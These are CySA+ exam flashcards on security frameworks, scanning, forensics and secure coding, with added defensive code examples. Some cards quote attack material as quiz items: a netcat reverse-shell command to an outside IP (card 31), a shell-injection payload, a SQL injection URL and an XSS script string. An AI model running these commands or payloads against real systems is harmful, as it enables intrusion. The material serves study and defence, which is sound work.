CySA+ Flashcards

1
Q

Vulnerability scan output: CVE-2011-3389
QID 42366 - SSLv3.0/TLSv1.0 Protocol Weak CBC Mode Server Side Vulnerability (the BEAST weakness). Check with: openssl s_client -connect login.diontraining.com:443 -tls1 -cipher "AES:CAMELLIA:SEED:3DES:DES"
What category should this be classified as?

A

Web application cryptography vulnerability. The server still negotiates TLS 1.0 with CBC cipher suites; the fix is to disable SSLv3/TLS 1.0 on the server and prefer TLS 1.2+ AEAD suites, then re-run the s_client check and confirm the handshake fails.

2
Q

You're an analyst for a bank with offices in multiple states. You want to create an alert to detect if an employee from one bank office logs into a workstation in an office in another state. What type of detection and analysis are you configuring?

A

Behavior-based detection: the rule fires on a deviation from the user's normal pattern (login location), not on a signature of known-bad content.

3
Q

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security software recommends you should remediate this. What should you do?

A

Move every client and server that supports it to port 636 (LDAPS). Binds over port 389 send credentials in cleartext, while 636 carries LDAP wrapped in TLS by default. Where a client cannot use 636, require StartTLS on 389 rather than leaving the bind unencrypted, and re-scan to confirm no plain binds remain.

4
Q

Your org has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what KPI (key performance indicator) could you use?

A

Alert volume: an increase may correlate with an increase in detected incidents (pair it with time-to-detect and time-to-respond to judge the process itself).

5
Q

What tools can be used to conduct a banner grab from a web server on a remote host?

A

netcat, wget, and telnet
(ftp cannot: an ftp client only speaks FTP, so it cannot send an HTTP request and read the Server header)
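What netcat or telnet do by hand (connect, send a minimal request, read the Server header) can be scripted. This is an added example, not code from the original flashcards; it starts a throwaway loopback HTTP server with a constructed banner so it runs offline, and the server name "ExampleHTTPd/1.2" is an assumption.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def grab_http_banner(host, port, timeout=5.0):
    """Send a minimal HEAD request and return the Server header (or None).
    Equivalent by hand:  printf 'HEAD / HTTP/1.0\\r\\n\\r\\n' | nc host port"""
    request = f"HEAD / HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        raw = b""
        while b"\r\n\r\n" not in raw:
            data = sock.recv(4096)
            if not data:
                break
            raw += data
    return parse_server_header(raw)


def parse_server_header(raw):
    """Pull the Server header out of a raw HTTP response head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            return value.strip()
    return None


class _BannerHandler(BaseHTTPRequestHandler):
    server_version = "ExampleHTTPd/1.2"  # constructed banner for the demo

    def do_HEAD(self):
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_test_server():
    """Start a throwaway HTTP server on a free loopback port; returns the port."""
    httpd = HTTPServer(("127.0.0.1", 0), _BannerHandler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd.server_address[1]


if __name__ == "__main__":
    port = start_test_server()
    print(grab_http_banner("127.0.0.1", port))
```

Python's BaseHTTP handler appends its own version to whatever server_version is set, so the grabbed banner starts with the configured name; real servers often strip or fake this header, which is why a banner is a lead, not proof of version.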

6
Q

A recent vulnerability scan found several vulnerabilities on an organization’s public facing IP address. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?

A

-A cryptographically weak cipher
-An HTTP response that reveals an internal IP address
-A website utilizing a self-signed SSL cert
*A buffer overflow that is known to allow remote code execution

7
Q

An adversary compromised a web server in your network using a zero-day exploit and then uses it as a C2 server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate?

A

Command and Control (C2), ATT&CK tactic TA0011

8
Q

Which analysis framework provides a graphical depiction of the attackers approach relative to a kill chain?

A

Diamond Model of Intrusion Analysis

9
Q

Which framework provides the most explicit detail regarding how to mitigate or detect a given threat?

A

MITRE ATT&CK

10
Q

According to the Center for Internet Security's system design recommendations, which control category would contain info on the best security practices to implement within the SDLC?

A

Application Software Security (CIS Control 16 in CIS Controls v8)

11
Q

A cybersecurity analyst has received an alert that sensors continuously observe well-known call-home messages at their network boundary. Still, the org's proxy firewall is properly configured and successfully drops the messages before they leave the network. What is the most likely cause of the messages being sent?

A

An infected workstation is attempting to reach a C2 server

12
Q

You’re investigating traffic involving 3 separate IP addresses (192.168.66.6, 10.66.6.10, 172.16.66.1). What REGEX expression would you use to be able to capture ONLY these 3 IP addresses?

A

\b(?:192\.168\.66\.6|10\.66\.6\.10|172\.16\.66\.1)\b
(Dots must be escaped, and the alternation sits inside one group so the word boundaries apply to every address. The form on the original card, \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b, lets each '.' match any character and leaves the middle alternative with no boundaries at all, so it also matches 10.66.6.100.)

13
Q

You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan but you don't have raw socket privileges on your workstation. What command should you use to conduct the scan from your workstation?

A

nmap -sT (TCP connect scan). A true SYN scan (-sS) needs raw sockets, i.e. root/administrator; without them nmap can only use connect(), which completes the three-way handshake and is therefore noisier and more likely to be logged.

14
Q

Nicole’s org doesn’t have the budget for 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. What service provider would be best suited for this?

A

MSSP: Managed Security Service Provider

15
Q

A company's CIO is concerned about the liability of a security vulnerability being exploited in their self-driving car where someone may die. What methodology would provide the single greatest mitigation if successfully implemented?

A

Formal methods of verification

16
Q

What provides a standard nomenclature for describing security-related software flaws?

A

CVE

17
Q

You suspect a system's firmware has been compromised. What type of firmware would provide resistance against such an attack?

A

Trusted Firmware

18
Q

What REGEX expression would provide the appropriate output when searching logs from only the IP subnet 172.161.1.224/26

A

\b172\.161\.1\.(19[2-9]|2[0-4][0-9]|25[0-5])\b
(.224 is not on a /26 boundary; the /26 that contains it is 172.161.1.192/26, hosts .192 through .255, which is exactly what the three alternatives cover. Escape the dots, or each one matches any character.)
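Both regex cards (12 and 18) are easiest to trust once the patterns are run over real lines. The block below is an added example, not part of the original flashcards: the log lines are constructed, and the ipaddress cross-check confirms that the card-18 pattern matches precisely the /26 that contains 172.161.1.224.

```python
import ipaddress
import re

# Card 12: dots escaped, whole alternation in one group so \b applies to all.
THREE_HOSTS = re.compile(r"\b(?:192\.168\.66\.6|10\.66\.6\.10|172\.16\.66\.1)\b")

# The card's original pattern, kept only for comparison: unescaped dots and
# word boundaries attached to the first and last alternative only.
THREE_HOSTS_LOOSE = re.compile(r"\b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b")

# Card 18: .224 is inside the block 172.161.1.192/26 (strict=False normalises).
SUBNET = ipaddress.ip_network("172.161.1.224/26", strict=False)
SUBNET_RE = re.compile(r"\b172\.161\.1\.(?:19[2-9]|2[0-4][0-9]|25[0-5])\b")

# Constructed sample log lines (not from the original page).
SAMPLE_LOG = """\
2024-03-01T10:00:01 sshd accepted login from 192.168.66.6
2024-03-01T10:00:02 http GET / from 10.66.6.100
2024-03-01T10:00:03 http GET / from 172.16.66.1
2024-03-01T10:00:04 dns query from 192x168x66x6
2024-03-01T10:00:05 smb session from 172.161.1.200
2024-03-01T10:00:06 smb session from 172.161.1.191
2024-03-01T10:00:07 smb session from 172.161.1.255
2024-03-01T10:00:08 smb session from 1172.161.1.224
"""


def grep(pattern, text):
    """Return the log lines in which `pattern` finds a match (like grep -E)."""
    return [line for line in text.splitlines() if pattern.search(line)]


def subnet_regex_matches_network():
    """Cross-check SUBNET_RE against the real /26 for every possible last octet."""
    for last in range(256):
        addr = f"172.161.1.{last}"
        in_net = ipaddress.ip_address(addr) in SUBNET
        if bool(SUBNET_RE.fullmatch(addr)) != in_net:
            return False
    return True


if __name__ == "__main__":
    print(SUBNET)                                   # 172.161.1.192/26
    print(len(grep(THREE_HOSTS, SAMPLE_LOG)))       # 2: only the exact addresses
    print(len(grep(THREE_HOSTS_LOOSE, SAMPLE_LOG))) # 4: 10.66.6.100 and 192x168x66x6 leak in
    print(len(grep(SUBNET_RE, SAMPLE_LOG)))         # 2: .200 and .255, not .191 or 1172...
```

The loose pattern over-matches on two of the eight lines; in a production log that is the difference between an alert on the three hosts of interest and an alert on everything that shares a prefix with them.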

19
Q

What is least likely to be included in a data retention policy?

A

Classification Info

20
Q

As a forensic analyst, what should you collect first?

A

Follow the order of volatility, most volatile first: CPU registers and cache (L1-L3), then RAM (system memory, including running processes and network state), then persistent storage (SSD/HDD), then backup drives and archival media.

21
Q

Your company is adopting a cloud first architecture model. Management wants to decommission the on-prem SIEM and migrate it to the cloud. What issues could arise?

A

Legal and regulatory issues may prevent data migration to the cloud

22
Q

Diamond Model of Intrusion Analysis

A

Framework for understanding the 4 key elements of cyber attacks. Adversary, victim, infrastructure, capability

23
Q

MITRE ATT&CK

A

Knowledge base of adversary tactics, techniques, and procedures (TTPs) observed in real intrusions. The Enterprise tactics are:
Reconnaissance · Resource Development · Initial Access · Execution · Persistence · Privilege Escalation · Defense Evasion · Credential Access · Discovery · Lateral Movement · Collection · Command and Control (C2) · Exfiltration · Impact
(Reconnaissance, Weaponization, Delivery, Exploitation, Installation, C2, Actions on Objectives are the Lockheed Martin Cyber Kill Chain phases, not ATT&CK tactics.)

24
Q

OWASP Testing Guide

A

Methodology for testing web application security

25
Cyber Kill Chain
Describes the stages of a cyber attack. Makes no allowances for an adversarial retreat
26
What secure coding practice ensures a character like < is translated into the &lt; entity when written to an HTML page?
Output Encoding (HTML entity encoding of untrusted data at the point where it is written into the page; the encoding must match the context, e.g. HTML body, attribute, or JavaScript)
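The difference between writing untrusted text straight into a page and encoding it first, as an added example that is not from the original flashcards. The comment string is a constructed attacker input.

```python
import html

# Constructed attacker-controlled input (not from the original page).
USER_COMMENT = '<script>alert(document.cookie)</script>'


def render_vulnerable(comment):
    """Untrusted input concatenated into HTML: the browser runs the script."""
    return f'<p class="comment">{comment}</p>'


def render_encoded(comment):
    """Entity-encode at the output boundary: the browser shows the text instead."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def encode_for_html(text):
    """The same translation spelled out, so it is clear which characters change.
    Order does not matter here because each input character is mapped once."""
    table = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;"}
    return "".join(table.get(ch, ch) for ch in text)


if __name__ == "__main__":
    print(render_vulnerable(USER_COMMENT))
    print(render_encoded(USER_COMMENT))
```

html.escape is the right tool for HTML body and attribute contexts; a value placed inside a script block, a URL, or a CSS property needs that context's encoder instead, which is why templating engines that auto-escape by context are preferred to manual calls.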
27
You are a cyber analyst at a privately owned bank. Which regulation would have the greatest impact on your bank's cybersecurity program?
GLBA (Gramm-Leach-Bliley Act): US federal law governing how financial institutions protect customers' private financial information
28
Root Cause Analysis
Involves investigating an incident to determine its origin and how it unfolded, with an aim of preventing similar incidents
29
Forensic Analysis
Thorough investigation whose focus is broader than root cause and often includes legal implications (evidence handling, chain of custody)
30
What can prevent firmware downgrades?
eFuse: one-time-programmable fuses in the silicon (a technique that originated at IBM) that a software instruction can blow permanently. Burning a fuse per firmware version gives an anti-rollback counter that a downgraded image cannot satisfy.
31
You see the following log entry. What is it and how do you stop it? sc config schedule start auto / net start schedule / at 10:42 "c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe"
The attacker enabled and started the Task Scheduler service and scheduled nc.exe (netcat, dropped in c:\temp) to run at 10:42, connecting out to 123.12.34.12 on port 443 with cmd.exe bound to the connection (-e): a reverse shell. Isolate the host from the network, then remove the scheduled job and the binary and investigate how they got there.
32
What technique would provide the largest increase in security on a network with ICS, SCADA, and IOT devices?
User and entity behavior analytics
33
tcpdump
Primarily used for capturing and analyzing network packets Faster than Wireshark No GUI
34
What sanitization technique removes data, overwriting a hard drive with randoms 1s and 0s?
Clear
35
Which part in a federation provides services to members of the federation?
RP: Relying Party
36
IdP
Identity Provider Provides identities, makes assertions about those identities and releases info about identity holders
37
SAML
Security Assertion Markup Language: open standard for exchanging authentication and authorization data between parties, in particular between an identity provider (IdP) and a service provider (SP)
38
SSO
Single Sign On Authentication scheme that allows users to log in with a single ID and password to related but independent software systems across a federation
39
What technique is most likely to identify a buffer overflow vulnerability in an app during development?
Static code analysis
40
You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence?
/etc/xinetd.conf and /etc/xinetd.d/ (legacy super-server). On systemd-based distributions check unit files instead: systemctl list-unit-files --state=enabled and /etc/systemd/system/
41
According to MITRE ATT&CK framework what capability can identify and exploit a zero-day vulnerablity?
Developed
42
What type of solution would you classify an FPGA?
Anti-tamper Field-Programmable Gate Array
43
WannaCry's use of Eternal Blue represents which phase of the Cyber Kill Chain?
Weaponization
44
What is the most widely used web-application scanner?
ZAP OWASP Zed Attack Proxy
45
What are 3 Infrastructure vulnerability scanners?
Qualys, OpenVAS, Nessus
46
What type of file is commonly used to store configuration settings for a macOS system?
plists (property lists)
47
During a vulnerability scan you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on that info what do you suspect is true?
You scanned a CDN-hosted version of the site. CDN: Content Delivery Network Geographically distributed network of proxy servers
48
What is the proper order of the UEFI boot phases?
SEC (Security) → PEI (Pre-EFI Initialization) → DXE (Driver Execution Environment) → BDS (Boot Device Select) → TSL (Transient System Load) → RT (Runtime)
49
What proprietary tool is used to create forensic disk images without making changes to the original evidence?
FTK Imager
50
Memdump
Used to collect content within RAM on a given host
51
Autopsy
Open-source forensic tool suite
52
Which role validates the user's identity when using SAML for authentication?
IdP
53
You need to sanitize hard drives from some leased workstations before returning them to a supplier. The hard drives contained sensitive data. What is the most appropriate process to ensure that data exposure doesn't occur during this process?
Purge, validate, and document the sanitization of the drives
54
What technology can be used to ensure that users who log into a network are physically in the same building as the network they are attempting to authenticate on?
GPS location and NAC
55
What describes the infrastructure needed to support the other architectural domains in the TOGAF framework?
Technology (technical) architecture
56
Dion Training wants to implement tech within their corporate network to BEST mitigate risk that a zero-day virus might infect their workstations. What should be implemented FIRST?
Application Whitelisting
57
You conduct a vulnerability scan of a data center and notice that the management interface for a virtualization platform is exposed to your vulnerability scanner. What network should the hypervisor's management interface be exposed to, to ensure the best security of the virtualization platform?
Management Network
58
You have just returned from a business trip from a country with a high intellectual property theft rate. What precautions should you take before reconnecting your laptop to your corporate network?
Scan for malware Physically inspect the laptop and compare it with images made before you left
59
You are trying to find some files deleted by a user on a Windows workstation. What 2 locations are most likely to contain the deleted files?
Recycle Bin and slack space
60
What does the Infrastructure component of the Diamond Model refer to?
The physical or virtual resources the adversary uses to deliver a capability and maintain control (e.g., the domains, mail servers, and C2 hosts behind a phishing campaign)
61
Persistence
MITRE ATT&CK tactic describing how the adversary maintains a foothold in the network across restarts, credential changes, and other interruptions
62
Command and Control
MITRE ATT&CK tactic covering the communication channels an adversary uses to control compromised systems
63
You want to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS?
DNS blackholing (sinkholing): the internal DNS server uses a list of known malicious domains and answers queries for them with a fake reply (NXDOMAIN or a sinkhole address), so the hosts never reach the real destination and the attempts are logged
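A DNS sinkhole configured on an internal Unbound resolver, as an added example (not from the original flashcards). The domain names and the sinkhole address 10.10.10.10 are assumptions; in practice the local-zone lines are generated from a threat-intelligence feed and pulled in with an include.

```conf
# unbound.conf excerpt (constructed example)
server:
    # Every name in the zone, including subdomains, resolves to the sinkhole
    # host, where a listener records which internal clients asked.
    local-zone: "malware-c2.example." redirect
    local-data: "malware-c2.example. A 10.10.10.10"

    # Alternative: answer NXDOMAIN so the client simply fails to connect.
    local-zone: "dropper.example." always_nxdomain

    # Log the queries; a hit on a sinkholed name is the detection.
    log-queries: yes
```

Check it with `unbound-checkconf` and then `dig @resolver malware-c2.example` from a client; the answer should be the sinkhole address, and the resolver log should show the querying host. The method works only for hosts that actually use the internal resolver, so egress filtering of direct DNS (port 53 and DNS-over-HTTPS) to the internet is the companion control.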
64
An org want to choose an authentication protocol that can be used over an insecure network without implementing additional encryption services. What protocol should you use?
Kerberos
65
An analyst suspect that a trojan has victimized a Linux system. Which command should be run to determine where the current bash shell is being executed?
which bash
66
SCAP
Security Content Automation Protocol Multi-purpose framework of specifications supporting automated configuration, vulnerability, and patch checking, tech control compliance activities, and security measurement
67
Security Onion
Free open-source Linux distro for intrusion detection, enterprise security monitoring, and log management
68
What utilizes a well-written set of carefully developed and tested scripts to orchestrate runbooks and generate consistent server builds across an enterprise?
Infrastructure as Code (IaC)
69
A forensic analyst needs to access a macOS encrypted drive that uses File Vault2. What are 3 means of unlocking the volume?
Extract the keys from iCloud Retrieve the key from memory while the volume is mounted Obtain the recovery key
70
You're a security Admin and need to respond to an ongoing spearphishing campaign against your org. What should be used as a checklist of actions to perform to detect and respond to this particular incident?
Playbook Runbook is an automated response
71
Input validation can prevent what vulnerabilities?
SQL Injection Cross-Site Scripting XML Injection Directory Traversal
72
What is the lowest layer of bare-metal virtualization environment?
The physical hardware
73
What type of vulnerability scan would provide the best results if you want to determine if the target's configuration settings are correct?
Credentialed Scan
74
Non-Credentialed Scan
Vulnerability scan that relies on external resources for configuration settings, which can be incorrect or altered
75
If you want to conduct an operating system identification during an nmap scan, what syntax should you use?
nmap -O
76
You need to verify the installation of a critical Windows patch on your org's workstations. What method would be the most efficient to validate the current patch status for all Windows 10 workstations?
Use SCCM to validate patch status Microsoft's System Center Configuration Manager
77
You review Python script used in your org's automation process. You notice the following line of code: os.system('rm -rfl'). What potential security concern does the code represent?
Command injection: os.system() hands the string to a shell, so any attacker-influenced part of that string can append further commands with ';', '&&', '|' or $(...). Use subprocess with an argument list (no shell) and validate the input.
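The os.system pattern beside its hardened form, as an added example that is not from the original flashcards. The allowed directory /var/tmp/app/ and the payload string are assumptions; echo stands in for rm so the demonstration is harmless.

```python
import re
import subprocess

# Assumed allowed location and character set for the path argument.
SAFE_PATH = re.compile(r"^/var/tmp/app/[A-Za-z0-9_.-]+$")

# Constructed malicious value for the path variable; not from the original page.
PAYLOAD = "/var/tmp/app/cache; echo INJECTED"


def cleanup_vulnerable(path):
    """Same shape as os.system('rm -rf ' + path): the string goes through
    /bin/sh, so ';', '&&', '|' and $(...) inside `path` are parsed as shell
    syntax and the second command runs with the script's privileges."""
    return subprocess.run("echo removing " + path, shell=True,
                          capture_output=True, text=True).stdout


def cleanup_safe(path):
    """No shell at all: each argv element reaches the program verbatim,
    so the whole payload is one literal argument."""
    return subprocess.run(["echo", "removing", path],
                          capture_output=True, text=True).stdout


def cleanup_checked(path):
    """Validate first (allow-list), then use the no-shell form."""
    if not SAFE_PATH.match(path):
        raise ValueError(f"refusing path {path!r}")
    return cleanup_safe(path)


if __name__ == "__main__":
    print(cleanup_vulnerable(PAYLOAD), end="")  # second line: INJECTED
    print(cleanup_safe(PAYLOAD), end="")        # one line, payload printed literally
```

If a shell is genuinely required (pipelines, globbing), shlex.quote() each untrusted piece before building the string; but the argv form plus validation is the default to reach for in automation scripts.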
78
Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the OS can load itself?
Measured Boot
79
If you post too much on social media like name, DOB, hometown,... it is easier for an attacker to conduct what type of attack?
Cognitive Password Attack
80
What authentication protocol was developed by Cisco to provide authentication, authorization, and accounting services?
TACACS+ Terminal Access Controller Access-Control System
81
What type of encryption would ensure the best security of a website?
TLS
82
You review the logs of a proxy server and see the following URL: http://test.diontraining.com/index/php?id=1%20OR%2017-7%3d10 What type of attack has likely occurred?
SQL injection. Decoded (%20 is a space, %3d is '='), the parameter is id=1 OR 17-7=10: an always-true condition appended to the WHERE clause, a classic probe for whether the id value is concatenated into the query.
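The URL from this card, decoded and fed to a concatenated query and to a parameterized one, as an added example that is not from the original flashcards. The in-memory articles table is constructed for the demonstration; the validation step at the end is the input-validation control from card 71.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Proxy-log URL from the card.
LOGGED_URL = "http://test.diontraining.com/index/php?id=1%20OR%2017-7%3d10"


def extract_id(url):
    """Decode the id parameter exactly as the application would see it."""
    return parse_qs(urlsplit(url).query)["id"][0]


def make_db():
    """Constructed in-memory table standing in for the application's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, public INTEGER)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(1, "Welcome", 1), (2, "Internal pricing", 0), (3, "Board minutes", 0)])
    return conn


def fetch_vulnerable(conn, raw_id):
    """String concatenation: the attacker's text becomes part of the WHERE clause."""
    sql = "SELECT title FROM articles WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def fetch_parameterized(conn, raw_id):
    """Bound parameter: the whole string is compared as a value, never parsed as SQL."""
    rows = conn.execute("SELECT title FROM articles WHERE id = ?", (raw_id,))
    return [row[0] for row in rows]


def fetch_validated(conn, raw_id):
    """Input validation in front of the parameterized query: an id must be digits."""
    if not raw_id.isdigit():
        raise ValueError(f"rejecting non-numeric id {raw_id!r}")
    return fetch_parameterized(conn, int(raw_id))


if __name__ == "__main__":
    conn = make_db()
    payload = extract_id(LOGGED_URL)          # '1 OR 17-7=10'
    print(fetch_vulnerable(conn, payload))    # all three titles, non-public rows included
    print(fetch_parameterized(conn, payload)) # []
```

With the concatenated query the tautology returns every row, including the two non-public ones; with the bound parameter the same text is just a value that matches no integer id. Validation on top turns the probe into a logged error rather than an empty result.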
83
A pentester is conducting an assessment of a wireless network that is secure using WPA2 Enterprise encryption. What are the 2 major differences between conducting reconnaissance of a wireless network vs wired?
Physical accessibility and Encryption
84
Management is concerned about rogue devices being attached to the network. What solutions would quickly provide the most accurate info that could be used to identify rogue devices on the network?
Router and Switch-based MAC address reporting
85
What automatically combines multiple disparate sources of info to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?
Data Enrichment
86
You're about to conduct forensics on a virtual machine. What process should be used to ensure that all of the data is acquired forensically?
Suspend the machine and copy the contents of the directory it resides in
87
What will an adversary do during the exploitation phase of the Lockheed Martin kill chain?
Take advantage of a software, hardware, or human vulnerability Wait for a user to click on a malicious link Wait for a malicious email attachment to be opened
88
When trying to thoroughly examine the security posture of a major e-commerce platform, which framework serves as an exhaustive guide dedicated explicitly to this purpose?
OWASP Testing Guide
89
Where should a forensic analyst search to find a list of the wireless networks that a laptop has previously connected to with a company-owned laptop?
Search the registry: profiles of previously joined networks are kept under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles
90
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise?
Segmentation Disable unused services
91
What are 3 concerns when migrating to a serverless architecture?
Protection of endpoint security Dependency on the cloud service provider Limited disaster recovery options
92
A cyber analyst is reviewing the logs of a proxy server and sees the following URL: https://www.google.com/search?q=password+filetype%3xls+site%3Adiontraining.com&pws=0&filter=p. What is true about the results of this search?
Decoded, the query is q=password filetype:xls site:diontraining.com (%3A is the hex code for ':' and '+' is a space; the log's filetype%3xls is missing the 'A', the intended operator is filetype:xls). filetype:xls returns only Microsoft Excel spreadsheets; site:diontraining.com returns only files hosted at diontraining.com; pws=0 turns personalization off. Net effect: a search for spreadsheets on diontraining.com that mention "password".
93
Which type of digital forensic investigation is most challenging due to the on-demand nature of the analyzed assets?
Cloud services
94
Your company has announced a change to an "API first" model of software development. As a cyber analyst you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. What is the primary basis for an attack against this vulnerability?
Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
95
What does a User Agent request a resource from when conducting a SAML transaction?
SP (Service Provider)
96
You company has just enabled key-based authentication on its SSH server. What action should be performed to secure the SSH server?
Disable password authentication for SSH (otherwise the keys add nothing against password guessing; the server still accepts either)
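The sshd_config settings that make the key-only policy actually take effect, as an added example (not from the original flashcards). Directive names are OpenSSH's; the choice of prohibit-password for root is an assumption about the environment.

```conf
# /etc/ssh/sshd_config (excerpt, constructed example)
PubkeyAuthentication yes
PasswordAuthentication no
# Keyboard-interactive is a second path to password prompts; close it too.
# On OpenSSH releases before 8.7 the keyword is ChallengeResponseAuthentication.
KbdInteractiveAuthentication no
PermitEmptyPasswords no
PermitRootLogin prohibit-password
# Belt and braces: list the only acceptable method explicitly.
AuthenticationMethods publickey
```

Validate with `sshd -t` before reloading, keep an existing session open while you test, and confirm from a client that `ssh -o PubkeyAuthentication=no -o PreferredAuthentications=password user@host` is refused with "Permission denied (publickey)" rather than a password prompt.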
97
You are creating a script to filter some logs so that you can detect any suspected malware beaconing. What are some typical means of identifying a malware beacons behavior on the network?
The beaconing interval (regular timing), the beacon's persistence (it keeps coming back over a long period), and the removal of known traffic (filter out legitimate periodic traffic such as DNS, NTP, and update checks first)
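The three indicators on this card turned into a filter over connection records, as an added example that is not from the original flashcards. The connection log and the known-good list are constructed; the thresholds (six events, coefficient of variation of 0.1) are assumptions to tune against your own traffic.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Destinations whose regular traffic is expected (an internal DNS server here).
# Removing known traffic first keeps the real beacon from drowning in noise.
KNOWN_GOOD = {"10.0.0.53"}

# Constructed connection log (timestamp src dst dport); not from the original page.
CONN_LOG = """\
2024-03-01T10:00:00 10.1.1.50 203.0.113.77 443
2024-03-01T10:00:00 10.1.1.50 10.0.0.53 53
2024-03-01T10:00:05 10.1.1.50 198.51.100.9 443
2024-03-01T10:00:07 10.1.1.50 198.51.100.9 443
2024-03-01T10:00:40 10.1.1.50 198.51.100.9 443
2024-03-01T10:01:00 10.1.1.50 10.0.0.53 53
2024-03-01T10:01:01 10.1.1.50 203.0.113.77 443
2024-03-01T10:02:00 10.1.1.50 203.0.113.77 443
2024-03-01T10:02:00 10.1.1.50 10.0.0.53 53
2024-03-01T10:02:59 10.1.1.50 203.0.113.77 443
2024-03-01T10:03:00 10.1.1.50 10.0.0.53 53
2024-03-01T10:03:12 10.1.1.50 198.51.100.9 443
2024-03-01T10:03:13 10.1.1.50 198.51.100.9 443
2024-03-01T10:04:00 10.1.1.50 10.0.0.53 53
2024-03-01T10:04:01 10.1.1.50 203.0.113.77 443
2024-03-01T10:05:00 10.1.1.50 203.0.113.77 443
2024-03-01T10:05:00 10.1.1.50 10.0.0.53 53
2024-03-01T10:06:00 10.1.1.50 10.0.0.53 53
2024-03-01T10:06:02 10.1.1.50 203.0.113.77 443
2024-03-01T10:07:00 10.1.1.50 203.0.113.77 443
2024-03-01T10:09:50 10.1.1.50 198.51.100.9 443
"""


def parse_log(text):
    """Group timestamps by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return flows


def find_beacons(text, known_good=KNOWN_GOOD, min_events=6, max_cv=0.1):
    """Flag flows that persist (>= min_events) and whose inter-arrival gaps are
    regular (coefficient of variation <= max_cv), after dropping known traffic."""
    hits = []
    for (src, dst, dport), times in parse_log(text).items():
        if dst in known_good or len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "dport": dport, "events": len(times),
                         "mean_interval": mean, "cv": round(cv, 4)})
    return sorted(hits, key=lambda h: h["cv"])


if __name__ == "__main__":
    for hit in find_beacons(CONN_LOG):
        print(hit)  # the 203.0.113.77:443 flow: ~60 s interval with a little jitter
```

The browsing flow to 198.51.100.9 has six events too, but its gaps are all over the place and it is not flagged; the DNS flow is perfectly periodic and would be flagged if it were not on the known-good list. Real implants add jitter, which is why the check uses a tolerance rather than an exact interval.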
98
Policy
Contains procedures and guidelines covering appropriate priorities, actions, and responsibilities in the event of a security incident
99
Procedure
Provide detailed, tactical info for the CSIRT to respond to an incident
100
What method should a cyber analyst use to locate any instances on the network where passwords are being sent in cleartext?
Full packet capture
101
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Your network has several different OSs in use but you only have 1 machine available to test the patches. What is the best environment to use to perform the testing of the patches before deployment?
Virtualization
102
In the Colonial Pipeline ransomware attack, the DarkSide ransomware group fulfilled their intent by encrypting files and demanding a ransom. Which phase of the Cyber Kill Chain does this represent?
Actions on Objectives
103
Lockheed Martin Kill Chain Stages
Reconnaissance Weaponization Delivery Exploitation Installation Command & Control (C2) Actions on Objectives
104
In the Cyber Kill Chain, at which stage does an attacker deliver the actual working part of the attack?
Exploitation. Exploitation: the attacker leverages the vulnerability to execute the main part of the attack. Weaponization: the attacker creates the malicious payload but does not deliver it.
105
Riaan's company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which compensating control should be recommended until the system can be remediated? A. Vulnerability scanning B. Encryption C. WAF D. IPS
C. WAF
106
A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com Which is true about the results of the search? A. Returns all web pages containing an email address affiliated with diontraining.com B. Returns all web pages containing the text diontraining.com C. Returns all web pages hosted at diontraining.com D. Returns no useful results
A. Returns all web pages containing an email address affiliated with diontraining.com %40 is the hex code for @
107
The 2018 Drupalgeddon2 incident saw hackers actively exploiting a highly critical vulnerability (CVE-2018-7600) in the Drupal content management system. Which versions of Drupal's security patch would have remediated this? A. Drupal 7.56/8.3.4 B. Drupal 7.54/8.2.7 C. Drupal 7.57/8.4.5 D. Drupal 7.58/8.5.1
D. Drupal 7.58/8.5.1
108
Which of the following functions is not provided by TPM? A. User authentication B. Random number generation C. Sealing D. Remote attestation E. Binding F. Secure Generation of cryptographic keys
A. User authentication
109
